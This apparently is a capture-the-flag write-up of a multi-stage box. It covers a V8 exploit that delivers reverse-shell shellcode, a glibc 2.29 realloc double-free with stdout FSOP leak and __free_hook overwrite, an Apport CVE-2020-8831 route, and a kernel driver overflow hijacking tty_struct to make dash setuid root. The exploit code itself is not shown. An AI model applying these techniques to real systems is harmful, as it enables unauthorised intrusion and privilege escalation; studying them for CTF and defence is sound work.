Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for elements as well as the size (just to choose any valid smi that's greater than or equal to size 1). I also subtracted another -0x8 from the address for the elements location, since pointer compression puts both the element's map and size in one single qword. Properties once again doesn't really matter, but the double array OOB leak handled it for us regardless so I just left it as that. As a setup for my WASM Instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.


And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode.

Here is my final exploit (note that it isn't 100%, probably due to some advanced garbage collector behavior or some other V8 internals that I dont' understand):


Now we popped a shell as chrome user. 

From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.

At this point during the release, only 3 players have popped a shell, and all of us were working towards users. This is when the A Team, per tradition, found an unintended route, and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know R4J and the A Team for their example crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege esclataion (after which will be run as root on the next ssh connection):


 Apparently several other boxes were vulnerable to the same bug... 

For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.

Reversing the binary comes up with the following pseudocode:


Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file spots, and you cannot have the same filenames (adding, removing, and editing are all done selectively by the filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows and etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to glibc source, realloc is as the following (__libc_realloc calls _int_realloc):


If the older chunk size is larger or equal to the requested chunk size, the chunk at that same memory location remains the same and it will attempt to split it. If it's large enough to be split into its own chunk, it'll get set up properly for it to be freed. Nothing would happen if you request a realloc() of the same size. By __libc_realloc, if the requested size is 0, then it just frees it and returns 0 (but that 0 is stored in a temporary value and by the program logic, won't replace the file content pointer).

If the older chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to wilderness, it will also try to extend to the next free chunk if possible and then deal with the split for remainder later (as when the older chunk size is larger or equal to the requested chunk size). Its last choice is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge. 

It only checks if size is less than or equal to 0x70. If we were to tell it to realloc a size of 0, we can make basically make it become a free. Without that check (and the fact that the pointer remains there), we can use this to emulate a double free; this is the central bug.

But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and main arena only differs in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, and there is only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of the libc itself during runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.

This is actually a really common technique, as detailed in HITCON baby tcache challenge. The linked writeup gives a much better explanation, but the gist is that puts calls _IO_new_file_xsputn, which will call _IO_new_file_overflow. Page 16 of the famous AngelBoy FSOP paper also discusses this technique.


Our end goal is to have this file structure path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals, and have our ch argument be EOF. The second argument is already set correctly from the call from _IO_new_file_xputn. To skip the first two conditions, we need to make sure to set the  _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flag field of the file structure. The following is _IO_do_write:


To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure _flag field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base. 

To summarize, based on libio.h, we can set the flag as the following: _IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING | ~_IO_NO_WRITE. The value for the _flags field should be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_base, and read_end to null. And now, we can use a single byte to tamper with write_base, and hence have the syscall write dump memory for us.

I will now discuss the exploit itself below. A really high level of understanding of the glibc heap behavior is a must know before reading. A lot of what I do is based on heap intuition and heap feng shui as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).

The first thing I did was store some chunks into the 0x60 and 0x80 tcachebins for usage after the leak. This is for when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user sized tcache chunk, filled it with 0x71 (for fake size metadata for later, this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).


Here is the current heap state:

Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). then I started pulling back from the 0x60 user sized tcache, and changed the fd pointer to redirect me into region of 0x......370 later on in the diagram above.



On my next allocation from the 0x70 tcache, I will still have the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real sized chunk (0x20 chunk will be sent into tcache). I then fake edited the 0x50 chunk, then split the chunk into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? Well, it is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370  location.



Remember now, that our current file content (size of 0x70), and the first item on the freelist for the 0x20 and 0x50 tcache freelist all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of current file content at 0x......390  to 0x91 (so once we fill the tcache of 0x90, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key structure in the “0x90” sized chunk to bypass the tcache double free mitigation, which I performed from the chunk allocated above as edit restricts us to not go over size of 0x70. 



Now we can overlap tcache bins with unsorted bins to help with a tcache bin with a 1/16 bit brute to write onto the _IO_2_1_stdout_ file structure. Here is where having different tcache bins of different size point to different locations become useful. If we just double freed the same chunk, then we can't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). Now, with my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure now. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses as the brute only worked locally. The code below will be the one adjusted for remote work, while the image will show the original local one without ASLR.



However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.

Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as unsorted bin is now corrupted). I then fake edited it, and then split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I can get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.



After this point, we can free our chunk once again to get space for a new allocation. I can get the location of __free_hook - 8 back by allocating from 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then it's just overwrite it with /bin/sh\x00 and address of system, and a subsequent free call from pop a shell.

Here is the final remote exploit:


Finally, we pop shell as R4J (remote 1/16 takes a few minutes):

However, we still weren't able to read the flag. It turns out that our group permissions were incorrect as we were still chromeuser group, but this is relatively trivial. newgrp - r4j will change our gid correctly, and we can grab the user flag.

Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
run dmesg
[   20.879368] ralloc: loading out-of-tree module taints kernel.
[   20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel

This will probably be the vulnerable driver. Looking in /dev, there was a ralloc device loaded. The driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the current protections. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice to disable KPTI and SMAP (although KPTI was originally enabled during testing, perhaps HackTheBox was running their servers on AMD Epyc and the whole issue KPTI was designed to address, Meltdown, wasn't an issue for AMD). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.

Reversing the kernel module comes up with the following pseudocode:


The bug is pretty clear here. When allocating from the ralloc ioctl, the size set in the global array for each entry is added to 0x20. This way, when you edit, you have a large kernel heap overflow. Deleting and reading are safe.

In order to even be able to debug this pwn efficiently, I had to use qemu so I can integrate it with peda remote debugging. I also must enable kvm, so I won't be stuck waiting 5 minutes for it to even boot. To set this up, I downloaded the 19.04 Ubuntu Server image, ensured the the kernel version was the same (5.0.0.38 from enumeration). I then set up an image drive for this specifically for an install with the following commands:

qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm

Then, to boot this kernel, I had to set the following flags:


I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” into /etc/default/grub, ran grub-update, loaded ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment for which we can hook peda onto. It would also be helpful to retrieve the System Map file as well as vmlinuz..

With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this usage; it can give both a KASLR leak via ptm_unix98_ops and rip control with its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly discuss some protections in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even if we don't get a heap leak, there is chance to overwrite and corrupt it with only an 8 byte overflow to get it to redirect properly (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, there were even more pointer hardening options added soon afterwards in later kernel versions). Another hardening option is freelist randomization, which as the name implies, randomizes the freelist. This means our heap operations won't be predictable like in glibc, so a heap spray will be necessary.

One of the first things in my kernel exploit are the helper functions and structs. I made the following:


As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to source, the struct is as the following:


Therefore, the 4th qword of this holds the tty_operations struct pointer, which for ptmx devices, will contain the address of ptm_unix98_ops. According to the Ubuntu System-Image file, that address will have its lower 12 bits be 6a0; this will come in handy for the heap spray. From the source, the following is the tty_operations struct:


Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd. 

For the spray, my plan was to just allocate a bunch of ptmx devices, and then loop through the array of 32 spots to allocate a ralloc chunk. After each allocation, I would check if it is adjacent to a ptmx device by performing an OOB read to see if there is a ptm_unix98_ops address (we have just enough of an OOB amount to hit that field of the structure). If that is the correct one, I will just return that index. Here is my implementation:


From there, we can rebase all the necessary addresses in the kernel we need for privilege escalation to uid 0.


Now we can replace the tty_operations struct pointer with our own malicious pointer with the OOB write. Take careful note to preserve the other addresses in this struct. I also spammed my malicious tty_operations struct with pty_close to prevent other crashes (it just helps fill it with valid pointers, and crashing won't really happen since ioctl is the only operation I am planning for it). I chose a stack pivot gadget that was xchg eax, esp (since the address of the function pointer will be in the rax register when I trigger the malicious ioctl). This also allows me to determine an absolute location to make my fake stack for the rop chain.


Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):

As you can see, there is a userland pointer that replaced the tty_operations struct pointer.

Now what should my rop chain be like? There is only SMEP, so this should be quite trivial with a ret2usr or even without it. However, the one issue I kept running into was the inability to use certain syscalls upon the return to usermode (such as execve), and I do not enjoy having an exploit that doesn't give me an ability to pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there is something I didn't clean up with the corruption created with the exploit, but I am not completely sure. In the end, I decided to just make my exploit make /usr/bin/dash a suid binary as root and then hang the kernel thread (for 49.7 days, which is long enough). The idea was to just run the following pseudocode:


Once we added that the rop chain into the target location after the stack pivot, we can trigger the malicious rop chain and become root. While we don't know which ptmx fd is the adjacent chunk, we can just loop through all of them, and run ioctl on all of them. Note that this exploit has to be run asynchronously in bash due to the hanging.

The following is the final exploit:


And after compiling and transfering to remote... (note that you can access this driver as chromeuser as well):


Whew, and finally, we can obtain the root flag! It was a really fun journey, and definitely sparked my interest in learning more about kernel pwning (as my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (as this is quite a complex writeup), and I am 100% looking forwards to Rope3.

Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17, and Overthink for giving this a read through and providing feedback to make the writeup even better.